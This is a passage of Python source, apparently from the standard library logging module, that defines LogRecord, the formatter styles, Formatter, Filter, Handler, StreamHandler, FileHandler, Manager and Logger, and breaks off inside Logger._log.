#shared dictionary _handlers, it needs to acquire the lock. But if configuring,
#the lock would already have been acquired - so we need an RLock.
#The same argument applies to Loggers and Manager.loggerDict.
#
_lock = threading.RLock()
def _acquireLock():
"""
Acquire the module-level lock for serializing access to shared data.
This should be released with _releaseLock().
"""
if _lock:
_lock.acquire()
def _releaseLock():
"""
Release the module-level lock acquired by calling _acquireLock().
"""
if _lock:
_lock.release()
# Prevent a held logging lock from blocking a child from logging.
if not hasattr(os, 'register_at_fork'): # Windows and friends.
def _register_at_fork_reinit_lock(instance):
pass # no-op when os.register_at_fork does not exist.
else:
# A collection of instances with a _at_fork_reinit method (logging.Handler)
# to be called in the child after forking. The weakref avoids us keeping
# discarded Handler instances alive.
_at_fork_reinit_lock_weakset = weakref.WeakSet()
def _register_at_fork_reinit_lock(instance):
_acquireLock()
try:
_at_fork_reinit_lock_weakset.add(instance)
finally:
_releaseLock()
def _after_at_fork_child_reinit_locks():
for handler in _at_fork_reinit_lock_weakset:
handler._at_fork_reinit()
# _acquireLock() was called in the parent before forking.
# The lock is reinitialized to unlocked state.
_lock._at_fork_reinit()
os.register_at_fork(before=_acquireLock,
after_in_child=_after_at_fork_child_reinit_locks,
after_in_parent=_releaseLock)
#---------------------------------------------------------------------------
# The logging record
#---------------------------------------------------------------------------
class LogRecord(object):
"""
A LogRecord instance represents an event being logged.
LogRecord instances are created every time something is logged. They
contain all the information pertinent to the event being logged. The
main information passed in is in msg and args, which are combined
using str(msg) % args to create the message field of the record. The
record also includes information such as when the record was created,
the source line where the logging call was made, and any exception
information to be logged.
"""
def __init__(self, name, level, pathname, lineno,
msg, args, exc_info, func=None, sinfo=None, **kwargs):
"""
Initialize a logging record with interesting information.
"""
ct = time.time()
self.name = name
self.msg = msg
#
# The following statement allows passing of a dictionary as a sole
# argument, so that you can do something like
# logging.debug("a %(a)d b %(b)s", {'a':1, 'b':2})
# Suggested by Stefan Behnel.
# Note that without the test for args[0], we get a problem because
# during formatting, we test to see if the arg is present using
# 'if self.args:'. If the event being logged is e.g. 'Value is %d'
# and if the passed arg fails 'if self.args:' then no formatting
# is done. For example, logger.warning('Value is %d', 0) would log
# 'Value is %d' instead of 'Value is 0'.
# For the use case of passing a dictionary, this should not be a
# problem.
# Issue #21172: a request was made to relax the isinstance check
# to hasattr(args[0], '__getitem__'). However, the docs on string
# formatting still seem to suggest a mapping object is required.
# Thus, while not removing the isinstance check, it does now look
# for collections.abc.Mapping rather than, as before, dict.
if (args and len(args) == 1 and isinstance(args[0], collections.abc.Mapping)
and args[0]):
args = args[0]
self.args = args
self.levelname = getLevelName(level)
self.levelno = level
self.pathname = pathname
try:
self.filename = os.path.basename(pathname)
self.module = os.path.splitext(self.filename)[0]
except (TypeError, ValueError, AttributeError):
self.filename = pathname
self.module = "Unknown module"
self.exc_info = exc_info
self.exc_text = None # used to cache the traceback text
self.stack_info = sinfo
self.lineno = lineno
self.funcName = func
self.created = ct
self.msecs = (ct - int(ct)) * 1000
self.relativeCreated = (self.created - _startTime) * 1000
if logThreads:
self.thread = threading.get_ident()
self.threadName = threading.current_thread().name
else: # pragma: no cover
self.thread = None
self.threadName = None
if not logMultiprocessing: # pragma: no cover
self.processName = None
else:
self.processName = 'MainProcess'
mp = sys.modules.get('multiprocessing')
if mp is not None:
# Errors may occur if multiprocessing has not finished loading
# yet - e.g. if a custom import hook causes third-party code
# to run when multiprocessing calls import. See issue 8200
# for an example
try:
self.processName = mp.current_process().name
except Exception: #pragma: no cover
pass
if logProcesses and hasattr(os, 'getpid'):
self.process = os.getpid()
else:
self.process = None
def __repr__(self):
return '<LogRecord: %s, %s, %s, %s, "%s">'%(self.name, self.levelno,
self.pathname, self.lineno, self.msg)
def getMessage(self):
"""
Return the message for this LogRecord.
Return the message for this LogRecord after merging any user-supplied
arguments with the message.
"""
msg = str(self.msg)
if self.args:
msg = msg % self.args
return msg
#
# Determine which class to use when instantiating log records.
#
_logRecordFactory = LogRecord
def setLogRecordFactory(factory):
"""
Set the factory to be used when instantiating a log record.
:param factory: A callable which will be called to instantiate
a log record.
"""
global _logRecordFactory
_logRecordFactory = factory
def getLogRecordFactory():
"""
Return the factory to be used when instantiating a log record.
"""
return _logRecordFactory
def makeLogRecord(dict):
"""
Make a LogRecord whose attributes are defined by the specified dictionary,
This function is useful for converting a logging event received over
a socket connection (which is sent as a dictionary) into a LogRecord
instance.
"""
rv = _logRecordFactory(None, None, "", 0, "", (), None, None)
rv.__dict__.update(dict)
return rv
#---------------------------------------------------------------------------
# Formatter classes and functions
#---------------------------------------------------------------------------
_str_formatter = StrFormatter()
del StrFormatter
class PercentStyle(object):
default_format = '%(message)s'
asctime_format = '%(asctime)s'
asctime_search = '%(asctime)'
validation_pattern = re.compile(r'%\(\w+\)[#0+ -]*(\*|\d+)?(\.(\*|\d+))?[diouxefgcrsa%]', re.I)
def __init__(self, fmt):
self._fmt = fmt or self.default_format
def usesTime(self):
return self._fmt.find(self.asctime_search) >= 0
def validate(self):
"""Validate the input format, ensure it matches the correct style"""
if not self.validation_pattern.search(self._fmt):
raise ValueError("Invalid format '%s' for '%s' style" % (self._fmt, self.default_format[0]))
def _format(self, record):
return self._fmt % record.__dict__
def format(self, record):
try:
return self._format(record)
except KeyError as e:
raise ValueError('Formatting field not found in record: %s' % e)
class StrFormatStyle(PercentStyle):
default_format = '{message}'
asctime_format = '{asctime}'
asctime_search = '{asctime'
fmt_spec = re.compile(r'^(.?[<>=^])?[+ -]?#?0?(\d+|{\w+})?[,_]?(\.(\d+|{\w+}))?[bcdefgnosx%]?$', re.I)
field_spec = re.compile(r'^(\d+|\w+)(\.\w+|\[[^]]+\])*$')
def _format(self, record):
return self._fmt.format(**record.__dict__)
def validate(self):
"""Validate the input format, ensure it is the correct string formatting style"""
fields = set()
try:
for _, fieldname, spec, conversion in _str_formatter.parse(self._fmt):
if fieldname:
if not self.field_spec.match(fieldname):
raise ValueError('invalid field name/expression: %r' % fieldname)
fields.add(fieldname)
if conversion and conversion not in 'rsa':
raise ValueError('invalid conversion: %r' % conversion)
if spec and not self.fmt_spec.match(spec):
raise ValueError('bad specifier: %r' % spec)
except ValueError as e:
raise ValueError('invalid format: %s' % e)
if not fields:
raise ValueError('invalid format: no fields')
class StringTemplateStyle(PercentStyle):
default_format = '${message}'
asctime_format = '${asctime}'
asctime_search = '${asctime}'
def __init__(self, fmt):
self._fmt = fmt or self.default_format
self._tpl = Template(self._fmt)
def usesTime(self):
fmt = self._fmt
return fmt.find('$asctime') >= 0 or fmt.find(self.asctime_format) >= 0
def validate(self):
pattern = Template.pattern
fields = set()
for m in pattern.finditer(self._fmt):
d = m.groupdict()
if d['named']:
fields.add(d['named'])
elif d['braced']:
fields.add(d['braced'])
elif m.group(0) == '$':
raise ValueError('invalid format: bare \'$\' not allowed')
if not fields:
raise ValueError('invalid format: no fields')
def _format(self, record):
return self._tpl.substitute(**record.__dict__)
BASIC_FORMAT = "%(levelname)s:%(name)s:%(message)s"
_STYLES = {
'%': (PercentStyle, BASIC_FORMAT),
'{': (StrFormatStyle, '{levelname}:{name}:{message}'),
'$': (StringTemplateStyle, '${levelname}:${name}:${message}'),
}
class Formatter(object):
"""
Formatter instances are used to convert a LogRecord to text.
Formatters need to know how a LogRecord is constructed. They are
responsible for converting a LogRecord to (usually) a string which can
be interpreted by either a human or an external system. The base Formatter
allows a formatting string to be specified. If none is supplied, the
the style-dependent default value, "%(message)s", "{message}", or
"${message}", is used.
The Formatter can be initialized with a format string which makes use of
knowledge of the LogRecord attributes - e.g. the default value mentioned
above makes use of the fact that the user's message and arguments are pre-
formatted into a LogRecord's message attribute. Currently, the useful
attributes in a LogRecord are described by:
%(name)s Name of the logger (logging channel)
%(levelno)s Numeric logging level for the message (DEBUG, INFO,
WARNING, ERROR, CRITICAL)
%(levelname)s Text logging level for the message ("DEBUG", "INFO",
"WARNING", "ERROR", "CRITICAL")
%(pathname)s Full pathname of the source file where the logging
call was issued (if available)
%(filename)s Filename portion of pathname
%(module)s Module (name portion of filename)
%(lineno)d Source line number where the logging call was issued
(if available)
%(funcName)s Function name
%(created)f Time when the LogRecord was created (time.time()
return value)
%(asctime)s Textual time when the LogRecord was created
%(msecs)d Millisecond portion of the creation time
%(relativeCreated)d Time in milliseconds when the LogRecord was created,
relative to the time the logging module was loaded
(typically at application startup time)
%(thread)d Thread ID (if available)
%(threadName)s Thread name (if available)
%(process)d Process ID (if available)
%(message)s The result of record.getMessage(), computed just as
the record is emitted
"""
converter = time.localtime
def __init__(self, fmt=None, datefmt=None, style='%', validate=True):
"""
Initialize the formatter with specified format strings.
Initialize the formatter either with the specified format string, or a
default as described above. Allow for specialized date formatting with
the optional datefmt argument. If datefmt is omitted, you get an
ISO8601-like (or RFC 3339-like) format.
Use a style parameter of '%', '{' or '$' to specify that you want to
use one of %-formatting, :meth:`str.format` (``{}``) formatting or
:class:`string.Template` formatting in your format string.
.. versionchanged:: 3.2
Added the ``style`` parameter.
"""
if style not in _STYLES:
raise ValueError('Style must be one of: %s' % ','.join(
_STYLES.keys()))
self._style = _STYLES[style][0](fmt)
if validate:
self._style.validate()
self._fmt = self._style._fmt
self.datefmt = datefmt
default_time_format = '%Y-%m-%d %H:%M:%S'
default_msec_format = '%s,%03d'
def formatTime(self, record, datefmt=None):
"""
Return the creation time of the specified LogRecord as formatted text.
This method should be called from format() by a formatter which
wants to make use of a formatted time. This method can be overridden
in formatters to provide for any specific requirement, but the
basic behaviour is as follows: if datefmt (a string) is specified,
it is used with time.strftime() to format the creation time of the
record. Otherwise, an ISO8601-like (or RFC 3339-like) format is used.
The resulting string is returned. This function uses a user-configurable
function to convert the creation time to a tuple. By default,
time.localtime() is used; to change this for a particular formatter
instance, set the 'converter' attribute to a function with the same
signature as time.localtime() or time.gmtime(). To change it for all
formatters, for example if you want all logging times to be shown in GMT,
set the 'converter' attribute in the Formatter class.
"""
ct = self.converter(record.created)
if datefmt:
s = time.strftime(datefmt, ct)
else:
s = time.strftime(self.default_time_format, ct)
if self.default_msec_format:
s = self.default_msec_format % (s, record.msecs)
return s
def formatException(self, ei):
"""
Format and return the specified exception information as a string.
This default implementation just uses
traceback.print_exception()
"""
sio = io.StringIO()
tb = ei[2]
# See issues #9427, #1553375. Commented out for now.
#if getattr(self, 'fullstack', False):
# traceback.print_stack(tb.tb_frame.f_back, file=sio)
traceback.print_exception(ei[0], ei[1], tb, None, sio)
s = sio.getvalue()
sio.close()
if s[-1:] == "\n":
s = s[:-1]
return s
def usesTime(self):
"""
Check if the format uses the creation time of the record.
"""
return self._style.usesTime()
def formatMessage(self, record):
return self._style.format(record)
def formatStack(self, stack_info):
"""
This method is provided as an extension point for specialized
formatting of stack information.
The input data is a string as returned from a call to
:func:`traceback.print_stack`, but with the last trailing newline
removed.
The base implementation just returns the value passed in.
"""
return stack_info
def format(self, record):
"""
Format the specified record as text.
The record's attribute dictionary is used as the operand to a
string formatting operation which yields the returned string.
Before formatting the dictionary, a couple of preparatory steps
are carried out. The message attribute of the record is computed
using LogRecord.getMessage(). If the formatting string uses the
time (as determined by a call to usesTime(), formatTime() is
called to format the event time. If there is exception information,
it is formatted using formatException() and appended to the message.
"""
record.message = record.getMessage()
if self.usesTime():
record.asctime = self.formatTime(record, self.datefmt)
s = self.formatMessage(record)
if record.exc_info:
# Cache the traceback text to avoid converting it multiple times
# (it's constant anyway)
if not record.exc_text:
record.exc_text = self.formatException(record.exc_info)
if record.exc_text:
if s[-1:] != "\n":
s = s + "\n"
s = s + record.exc_text
if record.stack_info:
if s[-1:] != "\n":
s = s + "\n"
s = s + self.formatStack(record.stack_info)
return s
#
# The default formatter to use when no other is specified
#
_defaultFormatter = Formatter()
class BufferingFormatter(object):
"""
A formatter suitable for formatting a number of records.
"""
def __init__(self, linefmt=None):
"""
Optionally specify a formatter which will be used to format each
individual record.
"""
if linefmt:
self.linefmt = linefmt
else:
self.linefmt = _defaultFormatter
def formatHeader(self, records):
"""
Return the header string for the specified records.
"""
return ""
def formatFooter(self, records):
"""
Return the footer string for the specified records.
"""
return ""
def format(self, records):
"""
Format the specified records and return the result as a string.
"""
rv = ""
if len(records) > 0:
rv = rv + self.formatHeader(records)
for record in records:
rv = rv + self.linefmt.format(record)
rv = rv + self.formatFooter(records)
return rv
#---------------------------------------------------------------------------
# Filter classes and functions
#---------------------------------------------------------------------------
class Filter(object):
"""
Filter instances are used to perform arbitrary filtering of LogRecords.
Loggers and Handlers can optionally use Filter instances to filter
records as desired. The base filter class only allows events which are
below a certain point in the logger hierarchy. For example, a filter
initialized with "A.B" will allow events logged by loggers "A.B",
"A.B.C", "A.B.C.D", "A.B.D" etc. but not "A.BB", "B.A.B" etc. If
initialized with the empty string, all events are passed.
"""
def __init__(self, name=''):
"""
Initialize a filter.
Initialize with the name of the logger which, together with its
children, will have its events allowed through the filter. If no
name is specified, allow every event.
"""
self.name = name
self.nlen = len(name)
def filter(self, record):
"""
Determine if the specified record is to be logged.
Is the specified record to be logged? Returns 0 for no, nonzero for
yes. If deemed appropriate, the record may be modified in-place.
"""
if self.nlen == 0:
return True
elif self.name == record.name:
return True
elif record.name.find(self.name, 0, self.nlen) != 0:
return False
return (record.name[self.nlen] == ".")
class Filterer(object):
"""
A base class for loggers and handlers which allows them to share
common code.
"""
def __init__(self):
"""
Initialize the list of filters to be an empty list.
"""
self.filters = []
def addFilter(self, filter):
"""
Add the specified filter to this handler.
"""
if not (filter in self.filters):
self.filters.append(filter)
def removeFilter(self, filter):
"""
Remove the specified filter from this handler.
"""
if filter in self.filters:
self.filters.remove(filter)
def filter(self, record):
"""
Determine if a record is loggable by consulting all the filters.
The default is to allow the record to be logged; any filter can veto
this and the record is then dropped. Returns a zero value if a record
is to be dropped, else non-zero.
.. versionchanged:: 3.2
Allow filters to be just callables.
"""
rv = True
for f in self.filters:
if hasattr(f, 'filter'):
result = f.filter(record)
else:
result = f(record) # assume callable - will raise if not
if not result:
rv = False
break
return rv
#---------------------------------------------------------------------------
# Handler classes and functions
#---------------------------------------------------------------------------
_handlers = weakref.WeakValueDictionary() #map of handler names to handlers
_handlerList = [] # added to allow handlers to be removed in reverse of order initialized
def _removeHandlerRef(wr):
"""
Remove a handler reference from the internal cleanup list.
"""
# This function can be called during module teardown, when globals are
# set to None. It can also be called from another thread. So we need to
# pre-emptively grab the necessary globals and check if they're None,
# to prevent race conditions and failures during interpreter shutdown.
acquire, release, handlers = _acquireLock, _releaseLock, _handlerList
if acquire and release and handlers:
acquire()
try:
if wr in handlers:
handlers.remove(wr)
finally:
release()
def _addHandlerRef(handler):
"""
Add a handler to the internal cleanup list using a weak reference.
"""
_acquireLock()
try:
_handlerList.append(weakref.ref(handler, _removeHandlerRef))
finally:
_releaseLock()
class Handler(Filterer):
"""
Handler instances dispatch logging events to specific destinations.
The base handler class. Acts as a placeholder which defines the Handler
interface. Handlers can optionally use Formatter instances to format
records as desired. By default, no formatter is specified; in this case,
the 'raw' message as determined by record.message is logged.
"""
def __init__(self, level=NOTSET):
"""
Initializes the instance - basically setting the formatter to None
and the filter list to empty.
"""
Filterer.__init__(self)
self._name = None
self.level = _checkLevel(level)
self.formatter = None
# Add the handler to the global _handlerList (for cleanup on shutdown)
_addHandlerRef(self)
self.createLock()
def get_name(self):
return self._name
def set_name(self, name):
_acquireLock()
try:
if self._name in _handlers:
del _handlers[self._name]
self._name = name
if name:
_handlers[name] = self
finally:
_releaseLock()
name = property(get_name, set_name)
def createLock(self):
"""
Acquire a thread lock for serializing access to the underlying I/O.
"""
self.lock = threading.RLock()
_register_at_fork_reinit_lock(self)
def _at_fork_reinit(self):
self.lock._at_fork_reinit()
def acquire(self):
"""
Acquire the I/O thread lock.
"""
if self.lock:
self.lock.acquire()
def release(self):
"""
Release the I/O thread lock.
"""
if self.lock:
self.lock.release()
def setLevel(self, level):
"""
Set the logging level of this handler. level must be an int or a str.
"""
self.level = _checkLevel(level)
def format(self, record):
"""
Format the specified record.
If a formatter is set, use it. Otherwise, use the default formatter
for the module.
"""
if self.formatter:
fmt = self.formatter
else:
fmt = _defaultFormatter
return fmt.format(record)
def emit(self, record):
"""
Do whatever it takes to actually log the specified logging record.
This version is intended to be implemented by subclasses and so
raises a NotImplementedError.
"""
raise NotImplementedError('emit must be implemented '
'by Handler subclasses')
def handle(self, record):
"""
Conditionally emit the specified logging record.
Emission depends on filters which may have been added to the handler.
Wrap the actual emission of the record with acquisition/release of
the I/O thread lock. Returns whether the filter passed the record for
emission.
"""
rv = self.filter(record)
if rv:
self.acquire()
try:
self.emit(record)
finally:
self.release()
return rv
def setFormatter(self, fmt):
"""
Set the formatter for this handler.
"""
self.formatter = fmt
def flush(self):
"""
Ensure all logging output has been flushed.
This version does nothing and is intended to be implemented by
subclasses.
"""
pass
def close(self):
"""
Tidy up any resources used by the handler.
This version removes the handler from an internal map of handlers,
_handlers, which is used for handler lookup by name. Subclasses
should ensure that this gets called from overridden close()
methods.
"""
#get the module data lock, as we're updating a shared structure.
_acquireLock()
try: #unlikely to raise an exception, but you never know...
if self._name and self._name in _handlers:
del _handlers[self._name]
finally:
_releaseLock()
def handleError(self, record):
"""
Handle errors which occur during an emit() call.
This method should be called from handlers when an exception is
encountered during an emit() call. If raiseExceptions is false,
exceptions get silently ignored. This is what is mostly wanted
for a logging system - most users will not care about errors in
the logging system, they are more interested in application errors.
You could, however, replace this with a custom handler if you wish.
The record which was being processed is passed in to this method.
"""
if raiseExceptions and sys.stderr: # see issue 13807
t, v, tb = sys.exc_info()
try:
sys.stderr.write('--- Logging error ---\n')
traceback.print_exception(t, v, tb, None, sys.stderr)
sys.stderr.write('Call stack:\n')
# Walk the stack frame up until we're out of logging,
# so as to print the calling context.
frame = tb.tb_frame
while (frame and os.path.dirname(frame.f_code.co_filename) ==
__path__[0]):
frame = frame.f_back
if frame:
traceback.print_stack(frame, file=sys.stderr)
else:
# couldn't find the right stack frame, for some reason
sys.stderr.write('Logged from file %s, line %s\n' % (
record.filename, record.lineno))
# Issue 18671: output logging message and arguments
try:
sys.stderr.write('Message: %r\n'
'Arguments: %s\n' % (record.msg,
record.args))
except RecursionError: # See issue 36272
raise
except Exception:
sys.stderr.write('Unable to print the message and arguments'
' - possible formatting error.\nUse the'
' traceback above to help find the error.\n'
)
except OSError: #pragma: no cover
pass # see issue 5971
finally:
del t, v, tb
def __repr__(self):
level = getLevelName(self.level)
return '<%s (%s)>' % (self.__class__.__name__, level)
class StreamHandler(Handler):
"""
A handler class which writes logging records, appropriately formatted,
to a stream. Note that this class does not close the stream, as
sys.stdout or sys.stderr may be used.
"""
terminator = '\n'
def __init__(self, stream=None):
"""
Initialize the handler.
If stream is not specified, sys.stderr is used.
"""
Handler.__init__(self)
if stream is None:
stream = sys.stderr
self.stream = stream
def flush(self):
"""
Flushes the stream.
"""
self.acquire()
try:
if self.stream and hasattr(self.stream, "flush"):
self.stream.flush()
finally:
self.release()
def emit(self, record):
"""
Emit a record.
If a formatter is specified, it is used to format the record.
The record is then written to the stream with a trailing newline. If
exception information is present, it is formatted using
traceback.print_exception and appended to the stream. If the stream
has an 'encoding' attribute, it is used to determine how to do the
output to the stream.
"""
try:
msg = self.format(record)
stream = self.stream
# issue 35046: merged two stream.writes into one.
stream.write(msg + self.terminator)
self.flush()
except RecursionError: # See issue 36272
raise
except Exception:
self.handleError(record)
def setStream(self, stream):
"""
Sets the StreamHandler's stream to the specified value,
if it is different.
Returns the old stream, if the stream was changed, or None
if it wasn't.
"""
if stream is self.stream:
result = None
else:
result = self.stream
self.acquire()
try:
self.flush()
self.stream = stream
finally:
self.release()
return result
def __repr__(self):
level = getLevelName(self.level)
name = getattr(self.stream, 'name', '')
# bpo-36015: name can be an int
name = str(name)
if name:
name += ' '
return '<%s %s(%s)>' % (self.__class__.__name__, name, level)
class FileHandler(StreamHandler):
"""
A handler class which writes formatted logging records to disk files.
"""
def __init__(self, filename, mode='a', encoding=None, delay=False, errors=None):
"""
Open the specified file and use it as the stream for logging.
"""
# Issue #27493: add support for Path objects to be passed in
filename = os.fspath(filename)
#keep the absolute path, otherwise derived classes which use this
#may come a cropper when the current directory changes
self.baseFilename = os.path.abspath(filename)
self.mode = mode
self.encoding = encoding
self.errors = errors
self.delay = delay
if delay:
#We don't open the stream, but we still need to call the
#Handler constructor to set level, formatter, lock etc.
Handler.__init__(self)
self.stream = None
else:
StreamHandler.__init__(self, self._open())
def close(self):
"""
Closes the stream.
"""
self.acquire()
try:
try:
if self.stream:
try:
self.flush()
finally:
stream = self.stream
self.stream = None
if hasattr(stream, "close"):
stream.close()
finally:
# Issue #19523: call unconditionally to
# prevent a handler leak when delay is set
StreamHandler.close(self)
finally:
self.release()
def _open(self):
"""
Open the current base file with the (original) mode and encoding.
Return the resulting stream.
"""
return open(self.baseFilename, self.mode, encoding=self.encoding,
errors=self.errors)
def emit(self, record):
"""
Emit a record.
If the stream was not opened because 'delay' was specified in the
constructor, open it before calling the superclass's emit.
"""
if self.stream is None:
self.stream = self._open()
StreamHandler.emit(self, record)
def __repr__(self):
level = getLevelName(self.level)
return '<%s %s (%s)>' % (self.__class__.__name__, self.baseFilename, level)
class _StderrHandler(StreamHandler):
"""
This class is like a StreamHandler using sys.stderr, but always uses
whatever sys.stderr is currently set to rather than the value of
sys.stderr at handler construction time.
"""
def __init__(self, level=NOTSET):
"""
Initialize the handler.
"""
Handler.__init__(self, level)
@property
def stream(self):
return sys.stderr
_defaultLastResort = _StderrHandler(WARNING)
lastResort = _defaultLastResort
#---------------------------------------------------------------------------
# Manager classes and functions
#---------------------------------------------------------------------------
class PlaceHolder(object):
"""
PlaceHolder instances are used in the Manager logger hierarchy to take
the place of nodes for which no loggers have been defined. This class is
intended for internal use only and not as part of the public API.
"""
def __init__(self, alogger):
"""
Initialize with the specified logger being a child of this placeholder.
"""
self.loggerMap = { alogger : None }
def append(self, alogger):
"""
Add the specified logger as a child of this placeholder.
"""
if alogger not in self.loggerMap:
self.loggerMap[alogger] = None
#
# Determine which class to use when instantiating loggers.
#
def setLoggerClass(klass):
"""
Set the class to be used when instantiating a logger. The class should
define __init__() such that only a name argument is required, and the
__init__() should call Logger.__init__()
"""
if klass != Logger:
if not issubclass(klass, Logger):
raise TypeError("logger not derived from logging.Logger: "
+ klass.__name__)
global _loggerClass
_loggerClass = klass
def getLoggerClass():
"""
Return the class to be used when instantiating a logger.
"""
return _loggerClass
class Manager(object):
"""
There is [under normal circumstances] just one Manager instance, which
holds the hierarchy of loggers.
"""
def __init__(self, rootnode):
"""
Initialize the manager with the root node of the logger hierarchy.
"""
self.root = rootnode
self.disable = 0
self.emittedNoHandlerWarning = False
self.loggerDict = {}
self.loggerClass = None
self.logRecordFactory = None
def getLogger(self, name):
"""
Get a logger with the specified name (channel name), creating it
if it doesn't yet exist. This name is a dot-separated hierarchical
name, such as "a", "a.b", "a.b.c" or similar.
If a PlaceHolder existed for the specified name [i.e. the logger
didn't exist but a child of it did], replace it with the created
logger and fix up the parent/child references which pointed to the
placeholder to now point to the logger.
"""
rv = None
if not isinstance(name, str):
raise TypeError('A logger name must be a string')
_acquireLock()
try:
if name in self.loggerDict:
rv = self.loggerDict[name]
if isinstance(rv, PlaceHolder):
ph = rv
rv = (self.loggerClass or _loggerClass)(name)
rv.manager = self
self.loggerDict[name] = rv
self._fixupChildren(ph, rv)
self._fixupParents(rv)
else:
rv = (self.loggerClass or _loggerClass)(name)
rv.manager = self
self.loggerDict[name] = rv
self._fixupParents(rv)
finally:
_releaseLock()
return rv
def setLoggerClass(self, klass):
"""
Set the class to be used when instantiating a logger with this Manager.
"""
if klass != Logger:
if not issubclass(klass, Logger):
raise TypeError("logger not derived from logging.Logger: "
+ klass.__name__)
self.loggerClass = klass
def setLogRecordFactory(self, factory):
"""
Set the factory to be used when instantiating a log record with this
Manager.
"""
self.logRecordFactory = factory
def _fixupParents(self, alogger):
"""
Ensure that there are either loggers or placeholders all the way
from the specified logger to the root of the logger hierarchy.
"""
name = alogger.name
i = name.rfind(".")
rv = None
while (i > 0) and not rv:
substr = name[:i]
if substr not in self.loggerDict:
self.loggerDict[substr] = PlaceHolder(alogger)
else:
obj = self.loggerDict[substr]
if isinstance(obj, Logger):
rv = obj
else:
assert isinstance(obj, PlaceHolder)
obj.append(alogger)
i = name.rfind(".", 0, i - 1)
if not rv:
rv = self.root
alogger.parent = rv
def _fixupChildren(self, ph, alogger):
"""
Ensure that children of the placeholder ph are connected to the
specified logger.
"""
name = alogger.name
namelen = len(name)
for c in ph.loggerMap.keys():
#The if means ... if not c.parent.name.startswith(nm)
if c.parent.name[:namelen] != name:
alogger.parent = c.parent
c.parent = alogger
def _clear_cache(self):
"""
Clear the cache for all loggers in loggerDict
Called when level changes are made
"""
_acquireLock()
for logger in self.loggerDict.values():
if isinstance(logger, Logger):
logger._cache.clear()
self.root._cache.clear()
_releaseLock()
#---------------------------------------------------------------------------
# Logger classes and functions
#---------------------------------------------------------------------------
class Logger(Filterer):
"""
Instances of the Logger class represent a single logging channel. A
"logging channel" indicates an area of an application. Exactly how an
"area" is defined is up to the application developer. Since an
application can have any number of areas, logging channels are identified
by a unique string. Application areas can be nested (e.g. an area
of "input processing" might include sub-areas "read CSV files", "read
XLS files" and "read Gnumeric files"). To cater for this natural nesting,
channel names are organized into a namespace hierarchy where levels are
separated by periods, much like the Java or Python package namespace. So
in the instance given above, channel names might be "input" for the upper
level, and "input.csv", "input.xls" and "input.gnu" for the sub-levels.
There is no arbitrary limit to the depth of nesting.
"""
def __init__(self, name, level=NOTSET):
"""
Initialize the logger with a name and an optional level.
"""
Filterer.__init__(self)
self.name = name
self.level = _checkLevel(level)
self.parent = None
self.propagate = True
self.handlers = []
self.disabled = False
self._cache = {}
def setLevel(self, level):
"""
Set the logging level of this logger. level must be an int or a str.
"""
self.level = _checkLevel(level)
self.manager._clear_cache()
def debug(self, msg, *args, **kwargs):
"""
Log 'msg % args' with severity 'DEBUG'.
To pass exception information, use the keyword argument exc_info with
a true value, e.g.
logger.debug("Houston, we have a %s", "thorny problem", exc_info=1)
"""
if self.isEnabledFor(DEBUG):
self._log(DEBUG, msg, args, **kwargs)
def info(self, msg, *args, **kwargs):
"""
Log 'msg % args' with severity 'INFO'.
To pass exception information, use the keyword argument exc_info with
a true value, e.g.
logger.info("Houston, we have a %s", "interesting problem", exc_info=1)
"""
if self.isEnabledFor(INFO):
self._log(INFO, msg, args, **kwargs)
def warning(self, msg, *args, **kwargs):
"""
Log 'msg % args' with severity 'WARNING'.
To pass exception information, use the keyword argument exc_info with
a true value, e.g.
logger.warning("Houston, we have a %s", "bit of a problem", exc_info=1)
"""
if self.isEnabledFor(WARNING):
self._log(WARNING, msg, args, **kwargs)
def warn(self, msg, *args, **kwargs):
warnings.warn("The 'warn' method is deprecated, "
"use 'warning' instead", DeprecationWarning, 2)
self.warning(msg, *args, **kwargs)
def error(self, msg, *args, **kwargs):
"""
Log 'msg % args' with severity 'ERROR'.
To pass exception information, use the keyword argument exc_info with
a true value, e.g.
logger.error("Houston, we have a %s", "major problem", exc_info=1)
"""
if self.isEnabledFor(ERROR):
self._log(ERROR, msg, args, **kwargs)
def exception(self, msg, *args, exc_info=True, **kwargs):
"""
Convenience method for logging an ERROR with exception information.
"""
self.error(msg, *args, exc_info=exc_info, **kwargs)
def critical(self, msg, *args, **kwargs):
"""
Log 'msg % args' with severity 'CRITICAL'.
To pass exception information, use the keyword argument exc_info with
a true value, e.g.
logger.critical("Houston, we have a %s", "major disaster", exc_info=1)
"""
if self.isEnabledFor(CRITICAL):
self._log(CRITICAL, msg, args, **kwargs)
def fatal(self, msg, *args, **kwargs):
"""
Don't use this method, use critical() instead.
"""
self.critical(msg, *args, **kwargs)
def log(self, level, msg, *args, **kwargs):
"""
Log 'msg % args' with the integer severity 'level'.
To pass exception information, use the keyword argument exc_info with
a true value, e.g.
logger.log(level, "We have a %s", "mysterious problem", exc_info=1)
"""
if not isinstance(level, int):
if raiseExceptions:
raise TypeError("level must be an integer")
else:
return
if self.isEnabledFor(level):
self._log(level, msg, args, **kwargs)
def findCaller(self, stack_info=False, stacklevel=1):
"""
Find the stack frame of the caller so that we can note the source
file name, line number and function name.
"""
f = currentframe()
#On some versions of IronPython, currentframe() returns None if
#IronPython isn't run with -X:Frames.
if f is not None:
f = f.f_back
orig_f = f
while f and stacklevel > 1:
f = f.f_back
stacklevel -= 1
if not f:
f = orig_f
rv = "(unknown file)", 0, "(unknown function)", None
while hasattr(f, "f_code"):
co = f.f_code
filename = os.path.normcase(co.co_filename)
if filename == _srcfile:
f = f.f_back
continue
sinfo = None
if stack_info:
sio = io.StringIO()
sio.write('Stack (most recent call last):\n')
traceback.print_stack(f, file=sio)
sinfo = sio.getvalue()
if sinfo[-1] == '\n':
sinfo = sinfo[:-1]
sio.close()
rv = (co.co_filename, f.f_lineno, co.co_name, sinfo)
break
return rv
def makeRecord(self, name, level, fn, lno, msg, args, exc_info,
func=None, extra=None, sinfo=None):
"""
A factory method which can be overridden in subclasses to create
specialized LogRecords.
"""
rv = _logRecordFactory(name, level, fn, lno, msg, args, exc_info, func,
sinfo)
if extra is not None:
for key in extra:
if (key in ["message", "asctime"]) or (key in rv.__dict__):
raise KeyError("Attempt to overwrite %r in LogRecord" % key)
rv.__dict__[key] = extra[key]
return rv
def _log(self, level, msg, args, exc_info=None, extra=None, stack_info=False,
stacklevel=1):
"""
Low-level logging routine which creates a LogRecord and then calls
all the handlers of this logger to handle the record.
"""
sinfo = None
if _srcfile:
#IronPython doesn't track Python frames, so findCaller raises an
#exception on some versions of IronPython. We trap it here so that
#IronPython can use logging.
try:
fn, lno, func, sinfo = self.findCaller(stack_info, stacklevel)
except ValueError: # pragma: no cover
